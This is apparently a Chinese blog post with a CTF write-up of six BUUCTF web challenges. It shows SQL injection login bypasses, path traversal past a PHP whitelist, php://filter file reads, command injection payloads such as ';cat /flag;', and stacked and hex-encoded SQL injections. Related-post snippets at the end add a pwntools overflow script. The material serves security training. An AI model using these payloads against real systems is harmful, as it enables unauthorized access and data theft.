BUUCTF(刷题日记)

已于 2023-03-30 09:03:54 修改
阅读量1.1k 收藏 2
点赞数 2
文章标签: php 服务器 apache sql
于 2023-03-23 20:05:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_74022830/article/details/129711132
版权
本文记录了作者在不同网络安全竞赛中解决Web挑战的历程,涉及SQL注入技巧,如万能密码、数字型单引号注入和堆叠注入,以及利用PHP伪协议和目录遍历漏洞获取flag的方法。还提到了源码审计和编码转换在解题过程中的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

前言

web刷题记录

一、[极客大挑战 2019]EasySQL

在这里插入图片描述首先使用万能密码:1’ or1=1#
在这里插入图片描述直接拿到flag
在这里插入图片描述

二、[极客大挑战 2019]Havefun

在这里插入图片描述
F12查看源码说需要用get方式传入cat参数并且cat=dog拿到flag
在这里插入图片描述

三、[HCTF 2018]WarmUp

查看源码
在这里插入图片描述看到有一个source.php文件直接进行访问
在这里插入图片描述发现里面还有一个hint.php文件访问一下
在这里插入图片描述
应该和翻阅目录有关审计一下source.php里面的代码

  //主函数
    if (! empty($_REQUEST['file'])   //判断$_REQUEST['file']不为空
        && is_string($_REQUEST['file']) //$_REQUEST['file']字符串
        && emmm::checkFile($_REQUEST['file'])//可以同过主函数校检
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
    //emmm类
class emmm
    {
        public static function checkFile(&$page)//将传入的参数赋值给$page
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//声明$whitelist(白名单)数组
            if (! isset($page) || !is_string($page)) {//如果不存在$page或者$page不是字符串返回false
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {//判断数组$page是否在$whitelist中
                return true;
            }

            $_page = mb_substr(//只取?号前的部分如果没有就截取整个$page
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {//判断数组$page是否在$whitelist中
                return true;
            }

            $_page = urldecode($page);//对$pagej进行url编码
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {/判断数组$page是否在$whitelist中
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

这里有两个思路
一.
使用两个?进行目录翻阅…/
在这里插入图片描述
用了5个…/
二.
就是对?进行两次url编码这样再传参的时候网站进行一次解码然后函数会进行一次解码?经过两次编码后是%253F
在这里插入图片描述拿到flag

四、[ACTF2020 新生赛]Include

在这里插入图片描述
点开后
在这里插入图片描述
题目也正好的是includePHP伪协议使用?file=php://filter/convert.base64-encode/resource=flag.php转换成base64查看解码一下就行
在这里插入图片描述

五、 [ACTF2020 新生赛]Exec

在这里插入图片描述
抓个包
在这里插入图片描述
在后面加个;ls /;查看根目录所有文件,这里没有过滤分号和/
在这里插入图片描述在这里插入图片描述
1;cat /flag;直接查看flag文件
在这里插入图片描述拿到flag

六、[强网杯 2019]随便注

SQL注入先用一下万能密码发现属于数字型单引号注入
在这里插入图片描述
使用1’ order by x#这里的x是从1开始,到3的时候报错说明有三列
在这里插入图片描述

发现一些语句被过滤了
使用堆叠注入用分号来代替union

1';show tables;爆表

在这里插入图片描述先查一下上面内个表(注意如果一个表名是纯数字的话需要加上反引号``查询)
在这里插入图片描述
flag在这里面但是查看不了可能被过滤了然后看大佬写的博客
借鉴 : 链接: BBUTF随便注

1,通过 rename 先把 words 表改名为其他的表名。

2,把 1919810931114514 表的名字改为 words 。

3 ,给新 words 表添加新的列名 id 。

4,将 flag 改名为 data 。

1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#

拿到flag
还有一个大佬写的
借鉴buuoj强网杯2019随便注

因为select被过滤了,所以先将select * from 1919810931114514进行16进制编码

再通过构造payload得

;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

进而得到flag

prepare…from…是预处理语句,会进行编码转换。
execute用来执行由SQLPrepare创建的SQL语句。
SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。

总结

使用;ls/;(查看所有根目录)
SQL中的rename语法和alter

第一篇完下次在见

yzhikk
关注
buuctf
小飒的博客
07-11 353
重温一下buuctf前面的目 hint: flag in ffffllllaaaagggg mb_substr() 函数返回字符串的一部分mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置checkFile函数的作用: 判断page是否被设置,是否为字符串 判断page是否在whitelist中 以?为分割符取出之前的字符,保存在page判断_page 判断p​age判断_page是否在whitelist中 url解码后以?为分割符取出之前字符,判断是否在whitelist中?fil
BUUCTF-PWN日记()
weixin_45461609的博客
04-30 1564
BUUCTF-PWN日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF
Oops-re的博客
09-24 243
BUUCTF 1.不一样的flag IDA32打开文件,并找到main函数,F5进入伪代码界面,从头分析 void main() { char v0; // [sp+17h] [bp-35h]@1 int v1; // [sp+30h] [bp-1Ch]@1 int v2; // [sp+34h] [bp-18h]@1 signed int v3; // [sp+38h] [bp-14h]@2 signed int i; // [sp+3Ch] [bp-10h]@14 int v
BUUCTF(Misc)——面具下的flag
最新发布
weixin_74738833的博客
04-09 1233
BUUCTF(Misc)——面具下的flag
BUUCTF
qq_18669681的博客
08-08 892
随便注 根据目判断就初步判断为注入。 但还是测试 1. ‘ 报错 2.’ or ‘’=’ 回显正常 尝试进行注入时发现对注入的常用关键词都进行了过滤。 进行堆叠注入查询表名 1';show tables; 查询字段 show coloums from 查询表的内容有多种方法,我使用的是多语句执行。 1';Set @x=0x73656c65637420666c61672066726f6d20...
buuctf
灰太的表格的博客
06-14 678
[GXYCTF2019]Ping Ping Ping ![猜测为命令拼接 尝试?ip=127.0.0.1 果然是,开始构造发现空格flag被ban ${IFS} $IFS$9 < <> linux中可以用来代替空格 可以用变量拼接解决flag字符串被ban http://0022d670-8595-4aa7-bfaf-a72fbb8e84d9.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php flag在源代码里 ...
Buuctf
qq_52761202的博客
08-20 324
Http F12,发现Secret.php 访问 referer:https://www.Sycsecret.com User-Agent:Syclover browser 本地访问:127.0.0.1 开伪代理 Easy calc 看一下页面源码,发现了提示: calc.php?num=encodeURIComponent($("#content").val()) $("#content").val() 是什么意思: 获取id为content的HTML标签元素的值,是JQuery, $("#
日记2(buuctf web
Aurora_lili的博客
04-25 475
单纯的url/flag.php得不到任何东西,查看wp,解释如下:这里它利用了filter伪协议,该协议刚好就能够查看文件包含的漏洞,所以当我们利用该协议查看flag.php时,会将它的源代码爆出来,但是因为base64的加密原因,所以我们还需要进行一次base64解密。5.0版本以上,varchar(100),指的是100字符,无论存放的是数字、字母还是UTF8汉字(每个汉字3字节),都可以存放100个。接着用改名字的方式获取flag,因为flag在1919的表中,所以我们最后要查询的是1919的表,
BUUCTF系列
qq_45655564的博客
07-11 580
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
BUUCTF 记录
best_Floats的博客
05-25 1398
然后再用ls查看,发现一个flag.txt文件,用cat命令进行查看,就可以看到flag了。先用ls命令看看有什么东西没有,发现没有返回的东西,说明一开始就进去了一个空的文件夹。这道主要考查的是ssh的知识,需要远程用ssh连接上这台虚拟机。这时我们可以用cd..这个命令去返回上一级。格式是:ssh -p 端口 用户名@网址。然后输入yes和密码,就成功连接上。打开了这个网页之后其实并没有什么用。我们需要通过主机cmd去用ssh链接。目中给了地址、端口、账号和密码。
BUUCTF记录
2301_78965658的博客
09-04 620
现在是暑假第四周,BUU现在是正在第三页。加油学,只要能不断超越过去的自己,就是最值得骄傲的事。
buuctf记录
Realiy的博客
08-06 922
8月6日buuctf [MRCTF2020]Ez_bypass 知识点MD5绕过,php特性 打开得到源码 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (m
BUUCTF(PWN)
fanshaoze的博客
09-27 442
查看我们main函数,发现这里只有system函数和/bin/sh,不存在栈溢出,终端直接nc就行。
[buuctf]记录
qq_61109509的博客
05-14 818
[网鼎杯 2018]Fakebook 考点 SSRF 新学: dirsearch使用 sqlmap ssrf 反序列化 绕过waf的联合注入 dirsearch使用桌面 python dirsearch.py -u 网址 -e * dirmap使用在kali ssrf 它是一种由攻击者构造形成,由服务端发起请求的一个安全漏洞。因为它是由服务端发起的,所以它能够请求到与它相连但与外网隔离的内部系统。 一般由curl的滥用引起。 ...
BUUCTF总结(基础篇)
weixin_51614272的博客
05-15 2509
目录[GXYCTF2019]Ping Ping Ping[极客大挑战 2019]Upload[极客大挑战 2019]BabySQL[ACTF2020 新生赛]Upload[极客大挑战 2019]BuyFlag[ACTF2020 新生赛]BackupFile[BJDCTF2020]Easy MD5[RoarCTF 2019]Easy Calc[HCTF 2018]admin[MRCTF2020]你传你🐎呢 [GXYCTF2019]Ping Ping Ping 知识点:命令执行 绕过: ; 来拼接命令 $I
buuctfweb
01-17
### BUUCTF Web 类型练习 #### 网站源码备份文件泄露和PHP反序列化 在BUUCTF平台上,有一道涉及网站源码备份文件泄露和PHP反序列化的目。这类目通常要求参赛者找到并利用服务器上存在的`.bak`或其他...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值